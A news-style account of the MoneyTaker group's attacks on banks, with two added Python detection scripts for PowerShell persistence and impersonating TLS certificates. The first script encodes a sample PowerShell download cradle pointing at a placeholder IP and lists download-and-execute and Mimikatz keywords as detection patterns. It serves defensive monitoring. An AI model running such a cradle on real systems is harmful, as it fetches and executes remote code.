Security experts have identified a covert group of Russian-speaking hackers known as MoneyTaker, which has been actively targeting banks, financial institutions, and legal firms predominantly in the United States, the United Kingdom, and Russia. The Moscow-based cybersecurity firm Group-IB released a detailed report on Monday, unveiling the group’s operations that date back to at least May 2016.
Over the last 18 months, MoneyTaker is believed to have carried out more than 20 successful attacks against financial organizations, stealing over $11 million along with internal documentation that could support future intrusions. The attacks concentrated on card processing and interbank payment systems: in Russia the AWS CBR, the Central Bank of Russia's automated interbank transfer workstation, and in the United States card processing networks. The report also names SWIFT, the international interbank messaging network, as a likely next target (the attribution question is discussed below).
Group-IB’s report indicates that criminals associated with MoneyTaker have acquired documentation for OceanSystems’ FedLink card processing system, utilized by around 200 banks across Latin America and the U.S. The firm has raised alarms that the hacking group’s operations are ongoing, with potential future targets including banks in Latin America.
Since their first reported attack in May 2016, MoneyTaker has concentrated on smaller community banks in states such as California, Illinois, and Florida, typically institutions with weaker security programs. Despite the number of attacks, the group has attracted little attention, largely because it relies on publicly available penetration-testing and post-exploitation tools such as Metasploit and Mimikatz, which are widely documented and have been presented at Russian hacking conferences; commodity tooling leaves little that is unique enough to attribute.
The group relies on fileless techniques: payloads execute in memory rather than being written to disk as executables, which defeats antivirus products that scan files. Persistence is achieved with PowerShell and VBS scripts, which are easy to adapt and inconspicuous, though the autorun entries, scheduled tasks and script-host launches they depend on are still visible in process and registry telemetry. For privilege escalation the attackers use exploit modules from the Metasploit framework, and they use Mimikatz to pull plaintext Windows credentials from the memory of compromised hosts.
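The tradecraft above (encoded PowerShell, script-based persistence, WMI consumers) does leave telemetry. The following is an added example, not code from the Group-IB report or from any product, of detection logic a SOC could run over endpoint events. The records are constructed in the shape of Sysmon process-creation, registry and WMI-consumer events; the IP address, paths and rule names are illustrative assumptions. The decoder also shows how an operator builds a `-EncodedCommand` argument (base64 over UTF-16LE), which is what lets the rule recover the plaintext script.

```python
import base64
import re
from typing import Dict, List, Optional

# Matches the -EncodedCommand switch and its common abbreviations (-enc, -ec, -e)
# followed by a base64 blob; powershell.exe accepts any unambiguous prefix.
ENC_RE = re.compile(r"(?i)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")
SUSPICIOUS_PS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
                 "frombase64string", "invoke-mimikatz", "reflection.assembly")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
INTERPRETERS = ("powershell", "pwsh", "wscript", "cscript", "mshta")
USER_WRITABLE = re.compile(r"(?i)\\(?:users|temp|appdata|programdata)\\")


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way an operator would: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext script hidden in an encoded PowerShell command line, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


ENCODED_SAMPLE = encode_command(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage')")

# Constructed records (not real telemetry from any victim) in the shape of Sysmon
# process-creation (event 1), registry-set (event 13) and WMI consumer (event 20) events.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"event": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"event": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + ENCODED_SAMPLE},
    {"event": "process_create", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //B //Nologo C:\Users\jdoe\AppData\Roaming\update.vbs"},
    {"event": "registry_set", "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "data": r"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"event": "registry_set", "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": r"wscript.exe //B C:\ProgramData\svc.vbs"},
    {"event": "wmi_consumer", "name": "SCM Event Log Consumer", "type": "CommandLineEventConsumer",
     "command": "powershell.exe -NoP -W Hidden -enc " + ENCODED_SAMPLE},
]


def analyze(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Apply four rules; each finding records the index of the offending event."""
    findings: List[Dict[str, object]] = []
    for i, ev in enumerate(events):
        kind = ev.get("event")
        if kind == "process_create":
            image = ev.get("image", "").lower().rsplit("\\", 1)[-1]
            cmd = ev.get("cmdline", "")
            # Rule 1: encoded PowerShell whose decoded body contains download/exec primitives.
            if image in ("powershell.exe", "pwsh.exe"):
                decoded = decode_encoded_command(cmd)
                if decoded is not None:
                    hits = [t for t in SUSPICIOUS_PS if t in decoded.lower()]
                    findings.append({"index": i, "rule": "encoded_powershell",
                                     "decoded": decoded, "indicators": hits})
            # Rule 2: a script host launched with a script from a user-writable directory.
            if image in SCRIPT_HOSTS and USER_WRITABLE.search(cmd):
                findings.append({"index": i, "rule": "script_host_user_path", "cmdline": cmd})
        elif kind == "registry_set":
            # Rule 3: a Run-key autostart that points at a script interpreter.
            if "\\currentversion\\run" in ev.get("key", "").lower() and \
                    any(t in ev.get("data", "").lower() for t in INTERPRETERS):
                findings.append({"index": i, "rule": "autorun_interpreter", "data": ev.get("data")})
        elif kind == "wmi_consumer":
            # Rule 4: a WMI event consumer whose command runs an interpreter.
            if any(t in ev.get("command", "").lower() for t in INTERPRETERS):
                findings.append({"index": i, "rule": "wmi_consumer", "command": ev.get("command")})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["rule"], f)
```

The benign backup script and the OneDrive autorun pass through; the four malicious records are flagged, and the first finding carries the decoded download cradle. In production these rules need tuning against an allow-list of administrative scripts, but the shape is the point: fileless does not mean traceless.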
MoneyTaker also generates its own TLS certificates with subject names imitating well-known organizations, Bank of America and Microsoft among them, so that command-and-control traffic passes, on casual inspection, for legitimate HTTPS. Such certificates do not chain to a trusted CA, so a proxy that validates chains, or a sensor that logs subject and issuer, can still spot them. The group's infrastructure is tightly controlled as well: payload servers answer only requests from a predetermined list of victim IP addresses, so researchers or sandboxes fetching the same URL from elsewhere receive nothing.
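A certificate that merely claims to be Bank of America is cheap to detect when the chain is recorded at the network edge. The following is an added example, not from the Group-IB report or from any product, of a check over TLS metadata whose fields mirror a Zeek ssl.log (`server_name`, `subject`, `issuer`, `validation_status`). The records, IP addresses, issuer names and the brand watchlist are constructed for illustration.

```python
import re
from typing import Dict, List, Optional

# Organizations the page says the group impersonated; extend with your own brand and peers.
WATCHLIST = ("bank of america", "microsoft")


def parse_dn(dn: str) -> Dict[str, str]:
    """Parse 'CN=a,O=b,C=US' into a dict. Commas inside a value are escaped as '\\,'."""
    out: Dict[str, str] = {}
    for part in re.split(r"(?<!\\),", dn):
        if "=" in part:
            key, value = part.split("=", 1)
            out[key.strip().upper()] = value.strip().replace("\\,", ",")
    return out


def brand_claimed(subject: str) -> Optional[str]:
    """Return the watchlisted brand named in the subject's CN/O/OU fields, if any."""
    dn = parse_dn(subject)
    text = " ".join(v.lower() for k, v in dn.items() if k in ("CN", "O", "OU"))
    for brand in WATCHLIST:
        if brand in text:
            return brand
    return None


# Constructed records shaped like Zeek ssl.log rows; none are real observations.
SAMPLE_SSL_LOG: List[Dict[str, str]] = [
    {"resp_h": "198.51.100.10", "server_name": "www.microsoft.com",
     "subject": "CN=www.microsoft.com,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US",
     "issuer": "CN=Example Public CA,O=Example Trust Services,C=US",
     "validation_status": "ok"},
    {"resp_h": "203.0.113.7", "server_name": "-",
     "subject": "CN=Bank of America,O=Bank of America,C=US",
     "issuer": "CN=Bank of America,O=Bank of America,C=US",
     "validation_status": "self signed certificate"},
    {"resp_h": "203.0.113.9", "server_name": "-",
     "subject": "CN=update.microsoft.com,O=Microsoft,L=Redmond,C=US",
     "issuer": "CN=update.microsoft.com,O=Microsoft,L=Redmond,C=US",
     "validation_status": "self signed certificate"},
    {"resp_h": "10.0.4.21", "server_name": "printer01.corp.example",
     "subject": "CN=printer01.corp.example",
     "issuer": "CN=printer01.corp.example",
     "validation_status": "self signed certificate"},
    {"resp_h": "203.0.113.44", "server_name": "-",
     "subject": "CN=secure.bankofamerica.com,O=Bank of America Corporation,C=US",
     "issuer": "CN=Intermediate CA 2,O=Bank of America Corporation,C=US",
     "validation_status": "unable to get local issuer certificate"},
]


def find_impersonated_certs(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Flag certificates that name a watchlisted brand but are self-signed or fail validation."""
    findings: List[Dict[str, str]] = []
    for r in records:
        brand = brand_claimed(r.get("subject", ""))
        if brand is None:
            continue
        status = r.get("validation_status", "").lower()
        self_signed = parse_dn(r.get("subject", "")) == parse_dn(r.get("issuer", ""))
        if status == "ok" and not self_signed:
            continue  # a real, publicly trusted certificate for that brand
        reason = "self-signed" if self_signed else f"chain not trusted ({status})"
        findings.append({"resp_h": r.get("resp_h", ""), "brand": brand,
                         "reason": reason, "subject": r.get("subject", "")})
    return findings


if __name__ == "__main__":
    for hit in find_impersonated_certs(SAMPLE_SSL_LOG):
        print(hit["resp_h"], hit["brand"], hit["reason"])
```

The genuine Microsoft certificate and the self-signed internal printer are left alone; the three brand-claiming certificates with no trusted chain are reported with the destination address, which is the pivot for finding the rest of the infrastructure.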
The first attack attributed to MoneyTaker, in May 2016, was a breach of First Data's STAR network, which the report describes as the largest bank transfer messaging system in the U.S., and it ended in theft. Later attacks followed the same pattern: the attackers gained access to a bank's internal network and manipulated the card processing system, removing or raising the cash withdrawal limits on cards they controlled so that money mules could empty ATMs without the cards' overdraft protections stopping them.
The average financial loss incurred by U.S. banks from MoneyTaker’s operations stands at approximately $500,000 per incident, while estimates indicate over $3 million was siphoned from multiple Russian banks. A notable attack aimed at a Russian bank employed modular malware designed to interface with the AWS CBR, effectively allowing attackers to modify payment orders discreetly before erasing traces of their intrusion.
The initial entry points are not established in most cases; in one incident the foothold was the home computer of a bank system administrator. Group-IB believes MoneyTaker is now preparing to target the SWIFT interbank messaging system, although there is no evidence linking the group to the recent attacks on SWIFT customers.
The campaign is a reminder that a well-resourced group can do a great deal of damage with freely available tools. The defensive response follows from the tradecraft described here: log and review PowerShell and script-host activity, protect credentials against in-memory theft of the kind Mimikatz performs, inspect outbound TLS for certificates that do not chain to a trusted authority, and treat administrators' home machines as part of the attack surface.